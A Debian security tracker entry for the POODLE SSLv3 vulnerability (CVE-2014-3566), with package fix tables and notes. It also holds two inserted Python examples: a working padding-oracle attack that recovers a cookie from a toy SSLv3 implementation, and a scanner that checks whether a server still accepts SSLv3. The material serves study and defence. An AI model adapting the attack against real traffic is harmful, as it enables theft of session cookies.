CVE-2014-3566

Name: CVE-2014-3566
Description: The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the "POODLE" issue.
Source: CVE (at NVD; CERT, LWN, oss-sec, fulldisc, bugtraq, EDB, Metasploit, Red Hat, Ubuntu, Gentoo, SuSE, Mageia, GitHub code/issues)
References: DLA-157-1, DLA-282-1, DLA-400-1, DSA-3092-1, DSA-3144-1, DSA-3147-1, DSA-3253-1, DSA-3489-1
NVD severity: medium (attack range: remote)
Debian Bugs: 765539, 765702, 765928, 768164, 769904, 769905, 771359
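The description above hinges on "nondeterministic CBC padding": an SSLv3 receiver checks only the last byte of the final block (the pad-length byte) and ignores the padding bytes before it. The following added example, which is not Debian's or any TLS library's code, builds a toy SSLv3 record layer around exactly that rule and runs the POODLE attack against it. Everything cryptographic is a stand-in and labelled as such in the code: a 4-round Feistel network plays the block cipher, HMAC-SHA1 plays the SSLv3 MAC, each record carries an explicit IV, and the cookie value, the request layout and the attacker's knowledge of the cookie length are constructed assumptions. The attacker replaces the all-padding final block of a record with the ciphertext block that holds a cookie byte; the server accepts about once in 256 tries, and each acceptance reveals one plaintext byte. `tls_padding_ok` shows the TLS 1.0 rule that closes the oracle.

```python
import hashlib, hmac, os

BLOCK = 16                   # block size of the stand-in cipher (AES-sized; 3DES would be 8)
MAC_LEN = 20                 # HMAC-SHA1 stands in for the SSLv3 MAC
SECRET = b"session=7f3a9c"   # constructed cookie value; the attacker only ever sees ciphertext
HEAD, MID = b"POST /", b" HTTP/1.0\r\nCookie: "

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Toy 4-round Feistel network on 16-byte blocks (assumption: any block cipher in CBC behaves the same).
def _round(key, rnd, half):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def block_encrypt(key, blk):
    left, right = blk[:8], blk[8:]
    for rnd in range(4):
        left, right = right, xor(left, _round(key, rnd, right))
    return left + right

def block_decrypt(key, blk):
    left, right = blk[:8], blk[8:]
    for rnd in reversed(range(4)):
        left, right = xor(right, _round(key, rnd, left)), left
    return left + right

def cbc_encrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        out.append(xor(block_decrypt(key, data[i:i + BLOCK]), prev))
        prev = data[i:i + BLOCK]
    return b"".join(out)

def ssl3_seal(enc_key, mac_key, plaintext):
    """Client: MAC-then-encrypt. SSLv3 padding is pad_len arbitrary bytes followed by the pad_len byte."""
    mac = hmac.new(mac_key, plaintext, hashlib.sha1).digest()
    pad_len = BLOCK - 1 - (len(plaintext) + MAC_LEN) % BLOCK
    record = plaintext + mac + os.urandom(pad_len) + bytes([pad_len])
    iv = os.urandom(BLOCK)   # explicit IV to keep the demo self-contained (SSLv3 chains the previous record)
    return iv + cbc_encrypt(enc_key, iv, record)

def ssl3_open(enc_key, mac_key, ciphertext):
    """Server: True if the record is accepted. That one bit is the padding oracle."""
    rec = cbc_decrypt(enc_key, ciphertext[:BLOCK], ciphertext[BLOCK:])
    pad_len = rec[-1]
    if pad_len >= BLOCK:         # SSLv3's only padding check is on the length byte ...
        return False
    body = rec[:-(pad_len + 1)]  # ... the pad_len bytes before it are never inspected
    plaintext, mac = body[:-MAC_LEN], body[-MAC_LEN:]
    return hmac.compare_digest(mac, hmac.new(mac_key, plaintext, hashlib.sha1).digest())

def tls_padding_ok(rec):
    """For contrast, the TLS 1.0+ rule: every pad byte must equal pad_len. A transplanted block
    then passes with probability about 2**-128 instead of 1/256, so there is no usable oracle."""
    pad_len = rec[-1]
    return len(rec) > pad_len and all(b == pad_len for b in rec[-(pad_len + 1):])

def browser_request(prefix_len, suffix_len):
    """Victim browser: attacker-controlled JavaScript picks path and body lengths; the browser adds the cookie."""
    return HEAD + b"a" * prefix_len + MID + SECRET + b"\r\n" + b"b" * suffix_len

def poodle_recover(enc_key, mac_key, secret_len, max_tries=100_000):
    """Active MITM: recover the cookie one byte per alignment, about 256 requests per byte.
    Assumes the attacker knows the request layout and cookie length, but neither key."""
    recovered = bytearray()
    fixed = len(HEAD) + len(MID)
    for k in range(secret_len):
        # Path length puts secret byte k in the last position of some block ...
        prefix_len = (BLOCK - 1 - fixed - k) % BLOCK
        offset = fixed + prefix_len + k
        # ... body length makes data+MAC a block multiple, so the final block is pure padding (pad_len 15).
        suffix_len = (-MAC_LEN - (fixed + prefix_len + secret_len + 2)) % BLOCK
        target = offset // BLOCK + 1          # block index, counting the IV as block 0
        for _ in range(max_tries):
            ct = ssl3_seal(enc_key, mac_key, browser_request(prefix_len, suffix_len))
            blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
            forged = b"".join(blocks[:-1]) + blocks[target]   # overwrite the padding block with the target
            if ssl3_open(enc_key, mac_key, forged):
                # Accepted iff D(C_t)[15] ^ C_{n-1}[15] == 15, so P_t[15] = 15 ^ C_{n-1}[15] ^ C_{t-1}[15].
                recovered.append((BLOCK - 1) ^ blocks[-2][15] ^ blocks[target - 1][15])
                break
        else:
            raise RuntimeError("oracle never accepted; is this really SSLv3 padding?")
    return bytes(recovered)

def demo():
    enc_key, mac_key = os.urandom(16), os.urandom(16)   # session keys, unknown to the attacker
    return poodle_recover(enc_key, mac_key, len(SECRET))

if __name__ == "__main__":
    print(demo())   # b'session=7f3a9c'
```

Running it prints the recovered cookie after a few thousand oracle queries. Both properties the attack needs are visible in `ssl3_open`: the accept/reject decision depends only on the last byte of a block the attacker gets to choose, and nothing else about the padding is verified. In the real protocol the per-request refresh of the ciphertext comes from CBC chaining across records and attacker-triggered browser requests; here it comes from the fresh IV in `ssl3_seal`.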

Vulnerable and fixed packages

The table below lists information on source packages.

Source Package | Release | Version | Status
arora | wheezy | 0.11.0-1 | vulnerable
arora | sid, jessie | 0.11.0+qt5+git2014-04-06-1 | vulnerable
bouncycastle | wheezy | 1.44+dfsg-3.1+deb7u1 | fixed
bouncycastle | wheezy (security) | 1.44+dfsg-3.1+deb7u2 | fixed
bouncycastle | jessie (security), jessie | 1.49+dfsg-3+deb8u2 | fixed
bouncycastle | stretch | 1.56-1 | fixed
bouncycastle | buster, sid | 1.57-1 | fixed
chromium-browser | wheezy, wheezy (security) | 37.0.2062.120-1~deb7u1 | vulnerable
chromium-browser | jessie (security), jessie | 57.0.2987.98-1~deb8u1 | fixed
chromium-browser | stretch | 59.0.3071.86-1 | fixed
chromium-browser | stretch (security) | 60.0.3112.78-1~deb9u1 | fixed
chromium-browser | buster, sid | 60.0.3112.78-1 | fixed
conkeror | wheezy | 1.0~~pre+git120527-1+deb7u1 | vulnerable
conkeror | jessie | 1.0~~pre-1+git141025-1+deb8u2 | vulnerable
conkeror | buster, sid, stretch | 1.0.3+git170123-1 | vulnerable
dwb | wheezy | 20120628hg-1 | vulnerable
dwb | jessie | 20140702hg-2 | vulnerable
epiphany-browser | wheezy | 3.4.2-2.1 | vulnerable
epiphany-browser | jessie | 3.14.1-1 | vulnerable
epiphany-browser | stretch | 3.22.7-1 | vulnerable
epiphany-browser | buster | 3.24.3-1 | vulnerable
epiphany-browser | sid | 3.26.0-1 | vulnerable
erlang | wheezy | 1:15.b.1-dfsg-4+deb7u1 | vulnerable
erlang | jessie | 1:17.3-dfsg-4+deb8u1 | fixed
erlang | stretch | 1:19.2.1+dfsg-2 | fixed
erlang | buster, sid | 1:20.0.4+dfsg-1 | fixed
gnutls26 | wheezy, wheezy (security) | 2.12.20-8+deb7u5 | vulnerable
gnutls28 | jessie | 3.3.8-6+deb8u7 | fixed
gnutls28 | jessie (security) | 3.3.8-6+deb8u6 | fixed
gnutls28 | stretch | 3.5.8-5+deb9u2 | fixed
gnutls28 | stretch (security) | 3.5.8-5+deb9u1 | fixed
gnutls28 | buster, sid | 3.5.15-2 | fixed
haskell-tls | wheezy | 0.9.5-1 | vulnerable
haskell-tls | jessie | 1.2.9-2 | fixed
haskell-tls | stretch | 1.3.8-3 | fixed
haskell-tls | buster, sid | 1.3.11-1 | fixed
icedove | wheezy | 38.7.0-1~deb7u1 | fixed
icedove | wheezy (security) | 1:52.3.0-4~deb7u2 | fixed
icedove | jessie | 1:45.8.0-3~deb8u1 | fixed
icedove | jessie (security) | 1:52.3.0-4~deb8u2 | fixed
icedove | stretch | 1:45.8.0-3 | fixed
icedove | stretch (security) | 1:52.3.0-4~deb9u1 | fixed
icedove | buster, sid | 1:52.3.0-4 | fixed
iceweasel | wheezy, wheezy (security) | 38.8.0esr-1~deb7u1 | fixed
iceweasel | jessie (security) | 38.8.0esr-1~deb8u1 | fixed
kde-baseapps | wheezy | 4:4.8.4-2 | vulnerable
kde-baseapps | jessie | 4:4.14.2-1 | vulnerable
kde-baseapps | buster, sid, stretch | 4:16.08.3-1 | vulnerable
lighttpd | wheezy | 1.4.31-4+deb7u4 | fixed
lighttpd | wheezy (security) | 1.4.31-4+deb7u5 | fixed
lighttpd | jessie (security), jessie | 1.4.35-4+deb8u1 | fixed
lighttpd | buster, sid, stretch | 1.4.45-1 | fixed
matrixssl | wheezy | 1.8.8-1 | vulnerable
midori | wheezy | 0.4.3+dfsg-0.1 | vulnerable
midori | stretch | 0.5.11-ds1-4 | vulnerable
netsurf | wheezy | 2.9-2 | vulnerable
netsurf | jessie | 3.2+dfsg-2 | vulnerable
netsurf | sid, stretch | 3.6-3.1 | vulnerable
nss | wheezy | 2:3.14.5-1+deb7u5 | vulnerable
nss | wheezy (security) | 2:3.26-1+debu7u4 | fixed
nss | jessie (security), jessie | 2:3.26-1+debu8u2 | fixed
nss | stretch | 2:3.26.2-1.1 | fixed
nss | buster, sid | 2:3.32-2 | fixed
openjdk-6 | wheezy, wheezy (security) | 6b38-1.13.10-1~deb7u1 | fixed
openjdk-7 | wheezy | 7u95-2.6.4-1~deb7u1 | fixed
openjdk-7 | wheezy (security) | 7u151-2.6.11-1+deb7u1 | fixed
openjdk-7 | jessie | 7u111-2.6.7-1~deb8u1 | fixed
openjdk-7 | jessie (security) | 7u151-2.6.11-1~deb8u1 | fixed
openjdk-8 | stretch | 8u131-b11-2 | fixed
openjdk-8 | stretch (security) | 8u141-b15-1~deb9u1 | fixed
openjdk-8 | buster, sid | 8u144-b01-1 | fixed
openssl | wheezy | 1.0.1e-2+deb7u20 | vulnerable
openssl | wheezy (security) | 1.0.1t-1+deb7u2 | fixed
openssl | jessie (security), jessie | 1.0.1t-1+deb8u6 | fixed
openssl | stretch | 1.1.0f-3 | fixed
openssl | buster, sid | 1.1.0f-5 | fixed
polarssl | wheezy, wheezy (security) | 1.2.9-1~deb7u6 | vulnerable
polarssl | jessie | 1.3.9-2.1+deb8u2 | fixed
polarssl | jessie (security) | 1.3.9-2.1+deb8u1 | fixed
pound | wheezy, wheezy (security) | 2.6-2+deb7u1 | fixed
pound | jessie (security), jessie | 2.6-6+deb8u1 | fixed
pound | buster, sid, stretch | 2.7-1.3 | fixed
surf | wheezy | 0.4.1-8 | vulnerable
surf | jessie | 0.6-1 | vulnerable
surf | stretch | 0.7-2 | vulnerable
surf | buster, sid | 2.0-3 | vulnerable
uzbl | wheezy, jessie | 0.0.0~git.20120514-1.1 | vulnerable
uzbl | stretch | 0.0.0~git.20120514-1.2 | vulnerable
wolfssl | buster, sid | 3.12.0+dfsg-1 | fixed

The information below is based on the following data on fixed versions.

Package | Type | Release | Fixed Version | Urgency | Origin | Debian Bugs
arora | source | (unstable) | (unfixed) | unimportant | |
bouncycastle | source | (unstable) | (not affected) | | |
chromium-browser | source | (unstable) | 39.0.2171.71-1 | medium | | 765928
chromium-browser | source | squeeze | (unfixed) | end-of-life | |
chromium-browser | source | wheezy | (unfixed) | end-of-life | |
conkeror | source | (unstable) | (unfixed) | unimportant | |
cyassl | source | (unstable) | (unfixed) | medium | | 769905
dwb | source | (unstable) | (unfixed) | unimportant | |
epiphany-browser | source | (unstable) | (unfixed) | unimportant | |
erlang | source | (unstable) | 1:17.3-dfsg-3 | medium | | 771359
galeon | source | (unstable) | (unfixed) | unimportant | |
gnutls26 | source | (unstable) | (unfixed) | medium | |
gnutls28 | source | (unstable) | 3.3.8-5 | medium | | 769904
haskell-tls | source | (unstable) | 1.2.9-2 | medium | | 768164
icedove | source | (unstable) | 31.3.0-1 | medium | |
icedove | source | squeeze | (unfixed) | end-of-life | |
icedove | source | wheezy | 31.3.0-1~deb7u1 | medium | DSA-3092-1 |
iceweasel | source | (unstable) | 31.2.0esr-2 | medium | |
iceweasel | source | squeeze | (unfixed) | end-of-life | |
kazehakase | source | (unstable) | (unfixed) | unimportant | |
kde-baseapps | source | (unstable) | (unfixed) | unimportant | |
kdebase | source | (unstable) | (unfixed) | unimportant | |
lighttpd | source | (unstable) | 1.4.35-4 | medium | | 765702
lighttpd | source | squeeze | 1.4.28-2+squeeze1.7 | medium | DLA-282-1 |
lighttpd | source | wheezy | 1.4.31-4+deb7u4 | medium | DSA-3489-1 |
matrixssl | source | (unstable) | (unfixed) | low | |
midori | source | (unstable) | (unfixed) | unimportant | |
netsurf | source | (unstable) | (unfixed) | unimportant | |
nss | source | (unstable) | 2:3.17.1-1 | medium | |
openjdk-6 | source | (unstable) | 6b34-1.13.6-1 | medium | |
openjdk-6 | source | squeeze | 6b34-1.13.6-1~deb6u1 | medium | DLA-157-1 |
openjdk-6 | source | wheezy | 6b34-1.13.6-1~deb7u1 | medium | DSA-3147-1 |
openjdk-7 | source | (unstable) | 7u75-2.5.4-1 | medium | |
openjdk-7 | source | wheezy | 7u75-2.5.4-1~deb7u1 | medium | DSA-3144-1 |
openjdk-8 | source | (unstable) | 8u40~b04-1 | medium | |
openssl | source | (unstable) | 1.0.1j-1 | medium | |
polarssl | source | (unstable) | 1.3.9-2 | medium | |
pound | source | (unstable) | 2.6-6 | medium | | 765539
pound | source | jessie | 2.6-6+deb8u1 | medium | DSA-3253-1 |
pound | source | squeeze | 2.6-1+deb6u1 | medium | DLA-400-1 |
pound | source | wheezy | 2.6-2+deb7u1 | medium | DSA-3253-1 |
surf | source | (unstable) | (unfixed) | unimportant | |
tlslite | source | (unstable) | (unfixed) | medium | |
uzbl | source | (unstable) | (unfixed) | unimportant | |
wolfssl | source | (unstable) | 3.4.8+dfsg-1 | medium | |

Notes

- bouncycastle <not-affected> (SSLv3 needs to be explicitly enabled)
http://www.kb.cert.org/vuls/id/BLUU-9PYTFQ
wolfssl was actually fixed with its initial upload to unstable (3.4.8+dfsg-1), after the source package was renamed from cyassl to wolfssl
[wheezy] - openssl <no-dsa> (Will be addressed through a point update, #774299)
[squeeze] - openssl <no-dsa> (Change considered too risky)
[squeeze] - gnutls26 <no-dsa> (Minor issue)
[wheezy] - gnutls26 <no-dsa> (Minor issue)
https://bugs.launchpad.net/ubuntu/+source/gnutls26/+bug/1510163
[wheezy] - haskell-tls <no-dsa> (Minor issue)
[squeeze] - matrixssl <no-dsa> (Minor issue)
[wheezy] - matrixssl <no-dsa> (Minor issue)
[squeeze] - nss <no-dsa> (Upstream doesn't plan to disable SSLv3, stick with that)
[wheezy] - nss <no-dsa> (Upstream doesn't plan to disable SSLv3, stick with that)
[squeeze] - polarssl <no-dsa> (Minor issue)
[wheezy] - polarssl <no-dsa> (Minor issue)
[squeeze] - pound <no-dsa> (Minor issue)
[wheezy] - tlslite <no-dsa> (Minor issue)
[squeeze] - erlang <no-dsa> (Minor issue)
[wheezy] - erlang <no-dsa> (Minor issue)
https://www.openssl.org/~bodo/ssl-poodle.pdf
http://googleonlinesecurity.blogspot.fr/2014/10/this-poodle-bites-exploiting-ssl-30.html
This CVE covers only the SSLv3 CBC padding weakness itself. It does not cover the protocol downgrade (a client retrying with SSLv3 after a failed TLS handshake) or the lack of TLS_FALLBACK_SCSV support that allows an attacker to force such a downgrade.
The fix is to disable SSLv3 in the library or in the application's configuration. Adding TLS_FALLBACK_SCSV alone stops the forced downgrade but does not remove the padding oracle for peers that negotiate SSLv3 anyway.
Browsers based on WebKit (with the exception of Chromium) or KHTML are not covered by security support.
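The note above says the fix is to disable SSLv3, so the check worth running after deploying it is whether a server still negotiates SSLv3 at all. The following added example (not from the Debian tracker, OpenSSL or any of the packages listed) hand-builds a minimal SSLv3 ClientHello and classifies the server's first record: a ServerHello announcing version 3.0 means SSLv3 is still enabled, an alert or an immediate close means it is refused. Building the hello by hand matters because an OpenSSL compiled with no-ssl3 (the build default since 1.1.0) will not send one for you via `openssl s_client -ssl3`. The cipher-suite list and the two sample replies are constructed for offline use; `probe()` performs the live network check and is not exercised offline.

```python
import os
import socket
import struct

SSL3 = b"\x03\x00"
# Cipher suites an SSLv3-capable server can pick from (constructed choice; any suite the server
# supports would do): AES128-SHA, AES256-SHA, DES-CBC3-SHA, RC4-SHA.
CIPHER_SUITES = [0x002F, 0x0035, 0x000A, 0x0005]


def build_client_hello(client_random=None):
    """Minimal SSLv3 ClientHello record: empty session id, no extensions (SSLv3 has none)."""
    client_random = os.urandom(32) if client_random is None else client_random
    suites = b"".join(struct.pack("!H", s) for s in CIPHER_SUITES)
    body = (SSL3 + client_random
            + b"\x00"                                   # session_id length 0
            + struct.pack("!H", len(suites)) + suites
            + b"\x01\x00")                              # one compression method: null
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body              # HandshakeType client_hello(1)
    return b"\x16" + SSL3 + struct.pack("!H", len(handshake)) + handshake  # ContentType handshake(22)


def classify_response(data):
    """Classify the first record a server sends back to the SSLv3 ClientHello."""
    if not data:
        return "refused"          # connection closed without an alert
    if len(data) < 5:
        return "unknown"
    content_type = data[0]
    # Record header is 5 bytes; handshake type at [5], 3-byte length at [6:9], server_version at [9:11].
    if content_type == 0x16 and len(data) >= 11 and data[5] == 0x02 and data[9:11] == SSL3:
        return "sslv3"            # ServerHello selecting version 3.0: SSLv3 still enabled
    if content_type == 0x15:
        return "refused"          # alert, typically protocol_version(70) or handshake_failure(40)
    return "unknown"


def probe(host, port=443, timeout=5.0):
    """Live check: connect, send the ClientHello, classify the reply. Not used by the offline demo."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_client_hello())
        try:
            return classify_response(sock.recv(4096))
        except ConnectionResetError:
            return "refused"      # a reset is another way servers decline an SSLv3 hello
        except socket.timeout:
            return "unknown"


# Constructed sample replies: a ServerHello that picked AES128-SHA under SSLv3 (vulnerable server),
# and a fatal protocol_version alert from a server with SSLv3 disabled (fixed server).
_sh_body = SSL3 + b"\x11" * 32 + b"\x00" + b"\x00\x2f" + b"\x00"
SAMPLE_SERVER_HELLO = (b"\x16" + SSL3 + struct.pack("!H", len(_sh_body) + 4)
                       + b"\x02" + len(_sh_body).to_bytes(3, "big") + _sh_body)
SAMPLE_ALERT = b"\x15" + SSL3 + b"\x00\x02" + b"\x02\x46"


def demo():
    return {"vulnerable_server": classify_response(SAMPLE_SERVER_HELLO),
            "fixed_server": classify_response(SAMPLE_ALERT)}


if __name__ == "__main__":
    print(demo())   # {'vulnerable_server': 'sslv3', 'fixed_server': 'refused'}
```

Against a real host, `probe("example.org")` returning "sslv3" means the server still accepts SSLv3 and remains exposed regardless of which client-side fixes are deployed; "refused" is the expected result once SSLv3 is disabled in the server's library or configuration.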
